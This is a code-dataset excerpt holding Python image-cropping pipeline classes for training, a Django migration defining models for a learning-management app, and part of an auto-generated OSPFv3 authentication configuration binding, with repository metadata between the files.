f'scale={self.scale}, ratio={self.ratio}, '
f'interpolation={self.interpolation})')
return repr_str
@PIPELINES.register_module()
class FixedCrop:
"""Crop paired data (at a specific position) to specific size for training.
Args:
keys (Sequence[str]): The images to be cropped.
crop_size (Tuple[int]): Target spatial size (h, w).
crop_pos (Tuple[int]): Specific position (x, y). If set to None,
random initialize the position to crop paired data batch.
"""
def __init__(self, keys, crop_size, crop_pos=None):
if not mmcv.is_tuple_of(crop_size, int):
raise TypeError(
'Elements of crop_size must be int and crop_size must be'
f' tuple, but got {type(crop_size[0])} in {type(crop_size)}')
if not mmcv.is_tuple_of(crop_pos, int) and (crop_pos is not None):
raise TypeError(
'Elements of crop_pos must be int and crop_pos must be'
f' tuple or None, but got {type(crop_pos[0])} in '
f'{type(crop_pos)}')
self.keys = keys
self.crop_size = crop_size
self.crop_pos = crop_pos
def _crop(self, data, x_offset, y_offset, crop_w, crop_h):
crop_bbox = [x_offset, y_offset, crop_w, crop_h]
data_ = data[y_offset:y_offset + crop_h, x_offset:x_offset + crop_w,
...]
return data_, crop_bbox
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Returns:
dict: A dict containing the processed data and information.
"""
if isinstance(results[self.keys[0]], list):
data_h, data_w = results[self.keys[0]][0].shape[:2]
else:
data_h, data_w = results[self.keys[0]].shape[:2]
crop_h, crop_w = self.crop_size
crop_h = min(data_h, crop_h)
crop_w = min(data_w, crop_w)
if self.crop_pos is None:
x_offset = np.random.randint(0, data_w - crop_w + 1)
y_offset = np.random.randint(0, data_h - crop_h + 1)
else:
x_offset, y_offset = self.crop_pos
crop_w = min(data_w - x_offset, crop_w)
crop_h = min(data_h - y_offset, crop_h)
for k in self.keys:
images = results[k]
is_list = isinstance(images, list)
if not is_list:
images = [images]
cropped_images = []
crop_bbox = None
for image in images:
# In fixed crop for paired images, sizes should be the same
if (image.shape[0] != data_h or image.shape[1] != data_w):
raise ValueError(
'The sizes of paired images should be the same. '
f'Expected ({data_h}, {data_w}), '
f'but got ({image.shape[0]}, '
f'{image.shape[1]}).')
data_, crop_bbox = self._crop(image, x_offset, y_offset,
crop_w, crop_h)
cropped_images.append(data_)
results[k + '_crop_bbox'] = crop_bbox
if not is_list:
cropped_images = cropped_images[0]
results[k] = cropped_images
results['crop_size'] = self.crop_size
results['crop_pos'] = self.crop_pos
return results
def __repr__(self):
repr_str = self.__class__.__name__
repr_str += (f'keys={self.keys}, crop_size={self.crop_size}, '
f'crop_pos={self.crop_pos}')
return repr_str
@PIPELINES.register_module()
class PairedRandomCrop:
"""Paried random crop.
It crops a pair of lq and gt images with corresponding locations.
It also supports accepting lq list and gt list.
Required keys are "scale", "lq", and "gt",
added or modified keys are "lq" and "gt".
Args:
gt_patch_size (int): cropped gt patch size.
"""
def __init__(self, gt_patch_size):
self.gt_patch_size = gt_patch_size
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Returns:
dict: A dict containing the processed data and information.
"""
scale = results['scale']
lq_patch_size = self.gt_patch_size // scale
lq_is_list = isinstance(results['lq'], list)
if not lq_is_list:
results['lq'] = [results['lq']]
gt_is_list = isinstance(results['gt'], list)
if not gt_is_list:
results['gt'] = [results['gt']]
h_lq, w_lq, _ = results['lq'][0].shape
h_gt, w_gt, _ = results['gt'][0].shape
if h_gt != h_lq * scale or w_gt != w_lq * scale:
raise ValueError(
f'Scale mismatches. GT ({h_gt}, {w_gt}) is not {scale}x '
f'multiplication of LQ ({h_lq}, {w_lq}).')
if h_lq < lq_patch_size or w_lq < lq_patch_size:
raise ValueError(
f'LQ ({h_lq}, {w_lq}) is smaller than patch size '
f'({lq_patch_size}, {lq_patch_size}). Please check '
f'{results["lq_path"][0]} and {results["gt_path"][0]}.')
# randomly choose top and left coordinates for lq patch
top = np.random.randint(h_lq - lq_patch_size + 1)
left = np.random.randint(w_lq - lq_patch_size + 1)
# crop lq patch
results['lq'] = [
v[top:top + lq_patch_size, left:left + lq_patch_size, ...]
for v in results['lq']
]
# crop corresponding gt patch
top_gt, left_gt = int(top * scale), int(left * scale)
results['gt'] = [
v[top_gt:top_gt + self.gt_patch_size,
left_gt:left_gt + self.gt_patch_size, ...] for v in results['gt']
]
if not lq_is_list:
results['lq'] = results['lq'][0]
if not gt_is_list:
results['gt'] = results['gt'][0]
return results
def __repr__(self):
repr_str = self.__class__.__name__
repr_str += f'(gt_patch_size={self.gt_patch_size})'
return repr_str
@PIPELINES.register_module()
class CropAroundCenter:
"""Randomly crop the images around unknown area in the center 1/4 images.
This cropping strategy is adopted in GCA matting. The `unknown area` is the
same as `semi-transparent area`.
https://arxiv.org/pdf/2001.04069.pdf
It retains the center 1/4 images and resizes the images to 'crop_size'.
Required keys are "fg", "bg", "trimap" and "alpha", added or modified keys
are "crop_bbox", "fg", "bg", "trimap" and "alpha".
Args:
crop_size (int | tuple): Desired output size. If int, square crop is
applied.
"""
def __init__(self, crop_size):
if mmcv.is_tuple_of(crop_size, int):
assert len(crop_size) == 2, 'length of crop_size must be 2.'
elif not isinstance(crop_size, int):
raise TypeError('crop_size must be int or a tuple of int, but got '
f'{type(crop_size)}')
self.crop_size = _pair(crop_size)
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Returns:
dict: A dict containing the processed data and information.
"""
fg = results['fg']
alpha = results['alpha']
trimap = results['trimap']
bg = results['bg']
h, w = fg.shape[:2]
assert bg.shape == fg.shape, (f'shape of bg {bg.shape} should be the '
f'same as fg {fg.shape}.')
crop_h, crop_w = self.crop_size
# Make sure h >= crop_h, w >= crop_w. If not, rescale imgs
rescale_ratio = max(crop_h / h, crop_w / w)
if rescale_ratio > 1:
new_h = max(int(h * rescale_ratio), crop_h)
new_w = max(int(w * rescale_ratio), crop_w)
fg = mmcv.imresize(fg, (new_w, new_h), interpolation='nearest')
alpha = mmcv.imresize(
alpha, (new_w, new_h), interpolation='nearest')
trimap = mmcv.imresize(
trimap, (new_w, new_h), interpolation='nearest')
bg = mmcv.imresize(bg, (new_w, new_h), interpolation='bicubic')
h, w = new_h, new_w
# resize to 1/4 to ignore small unknown patches
small_trimap = mmcv.imresize(
trimap, (w // 4, h // 4), interpolation='nearest')
# find unknown area in center 1/4 region
margin_h, margin_w = crop_h // 2, crop_w // 2
sample_area = small_trimap[margin_h // 4:(h - margin_h) // 4,
margin_w // 4:(w - margin_w) // 4]
unknown_xs, unknown_ys = np.where(sample_area == 128)
unknown_num = len(unknown_xs)
if unknown_num < 10:
# too few unknown area in the center, crop from the whole image
top = np.random.randint(0, h - crop_h + 1)
left = np.random.randint(0, w - crop_w + 1)
else:
idx = np.random.randint(unknown_num)
top = unknown_xs[idx] * 4
left = unknown_ys[idx] * 4
bottom = top + crop_h
right = left + crop_w
results['fg'] = fg[top:bottom, left:right]
results['alpha'] = alpha[top:bottom, left:right]
results['trimap'] = trimap[top:bottom, left:right]
results['bg'] = bg[top:bottom, left:right]
results['crop_bbox'] = (left, top, right, bottom)
return results
def __repr__(self):
return self.__class__.__name__ + f'(crop_size={self.crop_size})'
@PIPELINES.register_module()
class CropAroundUnknown:
"""Crop around unknown area with a randomly selected scale.
Randomly select the w and h from a list of (w, h).
Required keys are the keys in argument `keys`, added or
modified keys are "crop_bbox" and the keys in argument `keys`.
This class assumes value of "alpha" ranges from 0 to 255.
Args:
keys (Sequence[str]): The images to be cropped. It must contain
'alpha'. If unknown_source is set to 'trimap', then it must also
contain 'trimap'.
crop_sizes (list[int | tuple[int]]): List of (w, h) to be selected.
unknown_source (str, optional): Unknown area to select from. It must be
'alpha' or 'tirmap'. Default to 'alpha'.
interpolations (str | list[str], optional): Interpolation method of
mmcv.imresize. The interpolation operation will be applied when
image size is smaller than the crop_size. If given as a list of
str, it should have the same length as `keys`. Or if given as a
str all the keys will be resized with the same method.
Default to 'bilinear'.
"""
def __init__(self,
keys,
crop_sizes,
unknown_source='alpha',
interpolations='bilinear'):
if 'alpha' not in keys:
raise ValueError(f'"alpha" must be in keys, but got {keys}')
self.keys = keys
if not isinstance(crop_sizes, list):
raise TypeError(
f'Crop sizes must be list, but got {type(crop_sizes)}.')
self.crop_sizes = [_pair(crop_size) for crop_size in crop_sizes]
if not mmcv.is_tuple_of(self.crop_sizes[0], int):
raise TypeError('Elements of crop_sizes must be int or tuple of '
f'int, but got {type(self.crop_sizes[0][0])}.')
if unknown_source not in ['alpha', 'trimap']:
raise ValueError('unknown_source must be "alpha" or "trimap", '
f'but got {unknown_source}')
if unknown_source not in keys:
# it could only be trimap, since alpha is checked before
raise ValueError(
'if unknown_source is "trimap", it must also be set in keys')
self.unknown_source = unknown_source
if isinstance(interpolations, str):
self.interpolations = [interpolations] * len(self.keys)
elif mmcv.is_list_of(interpolations,
str) and len(interpolations) == len(self.keys):
self.interpolations = interpolations
else:
raise TypeError(
'interpolations must be a str or list of str with '
f'the same length as keys, but got {interpolations}')
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Returns:
dict: A dict containing the processed data and information.
"""
h, w = results[self.keys[0]].shape[:2]
rand_ind = np.random.randint(len(self.crop_sizes))
crop_h, crop_w = self.crop_sizes[rand_ind]
# Make sure h >= crop_h, w >= crop_w. If not, rescale imgs
rescale_ratio = max(crop_h / h, crop_w / w)
if rescale_ratio > 1:
h = max(int(h * rescale_ratio), crop_h)
w = max(int(w * rescale_ratio), crop_w)
for key, interpolation in zip(self.keys, self.interpolations):
results[key] = mmcv.imresize(
results[key], (w, h), interpolation=interpolation)
# Select the cropping top-left point which is an unknown pixel
if self.unknown_source == 'alpha':
unknown = (results['alpha'] > 0) & (results['alpha'] < 255)
else:
unknown = results['trimap'] == 128
top, left = random_choose_unknown(unknown.squeeze(), (crop_h, crop_w))
bottom = top + crop_h
right = left + crop_w
for key in self.keys:
results[key] = results[key][top:bottom, left:right]
results['crop_bbox'] = (left, top, right, bottom)
return results
def __repr__(self):
repr_str = self.__class__.__name__
repr_str += (f'(keys={self.keys}, crop_sizes={self.crop_sizes}, '
f"unknown_source='{self.unknown_source}', "
f'interpolations={self.interpolations})')
return repr_str
@PIPELINES.register_module()
class CropAroundFg:
"""Crop around the whole foreground in the segmentation mask.
Required keys are "seg" and the keys in argument `keys`.
Meanwhile, "seg" must be in argument `keys`. Added or modified keys are
"crop_bbox" and the keys in argument `keys`.
Args:
keys (Sequence[str]): The images to be cropped. It must contain
'seg'.
bd_ratio_range (tuple, optional): The range of the boundary (bd) ratio
to select from. The boundary ratio is the ratio of the boundary to
the minimal bbox that contains the whole foreground given by
segmentation. Default to (0.1, 0.4).
test_mode (bool): Whether use test mode. In test mode, the tight crop
area of foreground will be extended to the a square.
Default to False.
"""
def __init__(self, keys, bd_ratio_range=(0.1, 0.4), test_mode=False):
if 'seg' not in keys:
raise ValueError(f'"seg" must be in keys, but got {keys}')
if (not mmcv.is_tuple_of(bd_ratio_range, float)
or len(bd_ratio_range) != 2):
raise TypeError('bd_ratio_range must be a tuple of 2 int, but got '
f'{bd_ratio_range}')
self.keys = keys
self.bd_ratio_range = bd_ratio_range
self.test_mode = test_mode
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Returns:
dict: A dict containing the processed data and information.
"""
seg = results['seg']
height, width = seg.shape[:2]
# get foreground bbox
fg_coor = np.array(np.where(seg))
top, left = np.amin(fg_coor, axis=1)
bottom, right = np.amax(fg_coor, axis=1)
# enlarge bbox
long_side = np.maximum(bottom - top, right - left)
if self.test_mode:
bottom = top + long_side
right = left + long_side
boundary_ratio = np.random.uniform(*self.bd_ratio_range)
boundary = int(np.round(boundary_ratio * long_side))
# NOTE: Different from the original repo, we keep track of the four
# corners of the bbox (left, top, right, bottom) while the original
# repo use (top, left, height, width) to represent bbox. This may
# introduce an difference of 1 pixel.
top = max(top - boundary, 0)
left = max(left - boundary, 0)
bottom = min(bottom + boundary, height)
right = min(right + boundary, width)
for key in self.keys:
results[key] = results[key][top:bottom, left:right]
results['crop_bbox'] = (left, top, right, bottom)
return results
@PIPELINES.register_module()
class ModCrop:
"""Mod crop gt images, used during testing.
Required keys are "scale" and "gt",
added or modified keys are "gt".
"""
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Returns:
dict: A dict containing the processed data and information.
"""
img = results['gt'].copy()
scale = results['scale']
if img.ndim in [2, 3]:
h, w = img.shape[0], img.shape[1]
h_remainder, w_remainder = h % scale, w % scale
img = img[:h - h_remainder, :w - w_remainder, ...]
else:
raise ValueError(f'Wrong img ndim: {img.ndim}.')
results['gt'] = img
return results
@PIPELINES.register_module()
class CropLike:
"""Crop/pad the image in the target_key according to the size of image
in the reference_key .
Args:
target_key (str): The key needs to be cropped.
reference_key (str | None): The reference key, need its size.
Default: None.
"""
def __init__(self, target_key, reference_key=None):
assert reference_key and target_key
self.target_key = target_key
self.reference_key = reference_key
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Require self.target_key and self.reference_key.
Returns:
dict: A dict containing the processed data and information.
Modify self.target_key.
"""
size = results[self.reference_key].shape
old_image = results[self.target_key]
old_size = old_image.shape
h, w = old_size[:2]
new_size = size[:2] + old_size[2:]
h_cover, w_cover = min(h, size[0]), min(w, size[1])
format_image = np.zeros(new_size, dtype=old_image.dtype)
format_image[:h_cover, :w_cover] = old_image[:h_cover, :w_cover]
results[self.target_key] = format_image
return results
def __repr__(self):
return (self.__class__.__name__ + f' target_key={self.target_key}, ' +
f'reference_key={self.reference_key}')
| 37.718667
| 79
| 0.572413
|
b6d53abf6d7c153b38c23e0d0c79382d3138a8a9
| 13,609
|
py
|
Python
|
lms_app/migrations/0001_initial.py
|
neethu-niya/sbr
|
cdae2000e718ccc6fca948d241f29acb2d2b388d
|
[
"MIT"
] | null | null | null |
lms_app/migrations/0001_initial.py
|
neethu-niya/sbr
|
cdae2000e718ccc6fca948d241f29acb2d2b388d
|
[
"MIT"
] | null | null | null |
lms_app/migrations/0001_initial.py
|
neethu-niya/sbr
|
cdae2000e718ccc6fca948d241f29acb2d2b388d
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0 on 2020-12-11 10:25
import autoslug.fields
from django.db import migrations, models
import django.db.models.deletion
import phonenumber_field.modelfields
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Chapter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('slug', autoslug.fields.AutoSlugField(editable=False, null=True, populate_from='name')),
('active', models.BooleanField(default=False)),
('free_tier', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'Chapter',
'verbose_name_plural': 'Chapters',
},
),
migrations.CreateModel(
name='Chat',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('pdf', models.FileField(upload_to='staticfiles/pdf')),
('remark', models.CharField(max_length=200)),
('uploaded_by', models.CharField(choices=[('0', 'Admin'), ('1', 'Teacher'), ('2', 'Student')], max_length=255)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField(null=True)),
('created', models.DateTimeField(auto_now_add=True)),
('approved_comment', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='Documents',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('subtitle', models.CharField(max_length=255)),
('description', models.TextField(blank=True, null=True)),
('url_field', models.URLField(blank=True, null=True)),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('thumbnail_image', models.ImageField(blank=True, null=True, upload_to='staticfiles/thumbnail/')),
('pdf', models.FileField(upload_to='staticfiles/pdf')),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'Document',
'verbose_name_plural': 'Documents',
},
),
migrations.CreateModel(
name='File',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('pdf', models.FileField(upload_to='staticfiles/pdf')),
('remark', models.CharField(max_length=200)),
('uploaded_by', models.CharField(choices=[('0', 'Admin'), ('1', 'Teacher'), ('2', 'Student')], max_length=255)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Notification',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('description', models.TextField()),
('send_to', models.CharField(choices=[('Teacher', 'Teachers'), ('Student', 'Students')], max_length=255)),
('active', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
],
),
migrations.CreateModel(
name='Question_paper',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('subtitle', models.CharField(max_length=255)),
('description', models.TextField(blank=True, null=True)),
('url_field', models.URLField(blank=True, null=True)),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('thumbnail_image', models.ImageField(blank=True, null=True, upload_to='staticfiles/thumbnail/')),
('pdf', models.FileField(upload_to='staticfiles/pdf')),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'Question_paper',
'verbose_name_plural': 'Question_papers',
},
),
migrations.CreateModel(
name='Scheme',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('slug', autoslug.fields.AutoSlugField(editable=False, null=True, populate_from='name')),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Standard',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('address', models.CharField(blank=True, max_length=255, null=True)),
('city', models.CharField(blank=True, max_length=255, null=True)),
('district', models.CharField(blank=True, max_length=255, null=True)),
('email', models.EmailField(blank=True, max_length=254, null=True)),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('guardian_name', models.CharField(blank=True, max_length=255, null=True)),
('guardian_relation', models.CharField(blank=True, max_length=50, null=True)),
('contact_no', phonenumber_field.modelfields.PhoneNumberField(blank=True, default=None, max_length=128, null=True, region=None, unique=True)),
('whatsapp_no', phonenumber_field.modelfields.PhoneNumberField(blank=True, default=None, max_length=128, null=True, region=None, unique=True)),
('course_type', models.CharField(blank=True, max_length=255, null=True)),
('is_paid', models.BooleanField(default=False)),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Study_Material',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('subtitle', models.CharField(max_length=255)),
('description', models.TextField(blank=True, null=True)),
('url_field', models.URLField(blank=True, null=True)),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('thumbnail_image', models.ImageField(blank=True, null=True, upload_to='staticfiles/thumbnail/')),
('pdf', models.FileField(upload_to='staticfiles/pdf')),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'Study_Material',
'verbose_name_plural': 'Study_Materials',
},
),
migrations.CreateModel(
name='Subject',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('slug', autoslug.fields.AutoSlugField(editable=False, populate_from='name')),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Syllabus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'Syllabus',
'verbose_name_plural': 'Syllabus',
},
),
migrations.CreateModel(
name='Video',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('subtitle', models.CharField(blank=True, max_length=255, null=True)),
('description', models.TextField()),
('videofile', models.FileField(null=True, upload_to='staticfiles/media_root/videos/')),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('thumbnail_image', models.ImageField(blank=True, null=True, upload_to='staticfiles/thumbnail/')),
('url_field', models.URLField(blank=True, null=True)),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('chapter', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='lms_app.Chapter')),
('subject', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='lms_app.Subject')),
],
),
migrations.CreateModel(
name='Teacher',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('email', models.EmailField(blank=True, max_length=254, null=True)),
('contact_no_1', phonenumber_field.modelfields.PhoneNumberField(blank=True, default=None, max_length=128, null=True, region=None, unique=True)),
('whatsapp_no', phonenumber_field.modelfields.PhoneNumberField(blank=True, default=None, max_length=128, null=True, region=None, unique=True)),
('address', models.CharField(max_length=255)),
('image', models.ImageField(blank=True, null=True, upload_to='staticfiles/image/')),
('gender', models.CharField(choices=[('0', 'Male'), ('1', 'Female')], max_length=6, null=True)),
('active', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('subject', models.ManyToManyField(blank=True, to='lms_app.Subject')),
],
),
]
| 55.097166
| 160
| 0.571754
|
9df9e5e190eefc7158034bd5de3cc58878918fa3
| 9,797
|
py
|
Python
|
pybind/slxos/v17r_2_00/routing_system/ipv6/router/ospf/area/virtual_link/link_properties/authentication/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v17r_2_00/routing_system/ipv6/router/ospf/area/virtual_link/link_properties/authentication/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v17r_2_00/routing_system/ipv6/router/ospf/area/virtual_link/link_properties/authentication/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import ipsec_auth_key_config
class authentication(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-common-def - based on the path /routing-system/ipv6/router/ospf/area/virtual-link/link-properties/authentication. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Authentication of OSPF messages
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__key_chain','__ipsec_auth_key_config',)
_yang_name = 'authentication'
_rest_name = 'authentication'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__key_chain = YANGDynClass(base=unicode, default=unicode(""), is_leaf=True, yang_name="key-chain", rest_name="key-chain", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Key Chain reference'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='string', is_config=True)
self.__ipsec_auth_key_config = YANGDynClass(base=ipsec_auth_key_config.ipsec_auth_key_config, is_container='container', presence=False, yang_name="ipsec-auth-key-config", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'cli-drop-node-name': None, u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'routing-system', u'ipv6', u'router', u'ospf', u'area', u'virtual-link', u'link-properties', u'authentication']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'ipv6', u'router', u'ospf', u'area', u'virtual-link', u'authentication']
def _get_key_chain(self):
"""
Getter method for key_chain, mapped from YANG variable /routing_system/ipv6/router/ospf/area/virtual_link/link_properties/authentication/key_chain (string)
"""
return self.__key_chain
def _set_key_chain(self, v, load=False):
"""
Setter method for key_chain, mapped from YANG variable /routing_system/ipv6/router/ospf/area/virtual_link/link_properties/authentication/key_chain (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_key_chain is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_key_chain() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, default=unicode(""), is_leaf=True, yang_name="key-chain", rest_name="key-chain", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Key Chain reference'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """key_chain must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, default=unicode(""), is_leaf=True, yang_name="key-chain", rest_name="key-chain", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Key Chain reference'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='string', is_config=True)""",
})
self.__key_chain = t
if hasattr(self, '_set'):
self._set()
def _unset_key_chain(self):
self.__key_chain = YANGDynClass(base=unicode, default=unicode(""), is_leaf=True, yang_name="key-chain", rest_name="key-chain", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Key Chain reference'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='string', is_config=True)
def _get_ipsec_auth_key_config(self):
"""
Getter method for ipsec_auth_key_config, mapped from YANG variable /routing_system/ipv6/router/ospf/area/virtual_link/link_properties/authentication/ipsec_auth_key_config (container)
"""
return self.__ipsec_auth_key_config
def _set_ipsec_auth_key_config(self, v, load=False):
"""
Setter method for ipsec_auth_key_config, mapped from YANG variable /routing_system/ipv6/router/ospf/area/virtual_link/link_properties/authentication/ipsec_auth_key_config (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_ipsec_auth_key_config is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ipsec_auth_key_config() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
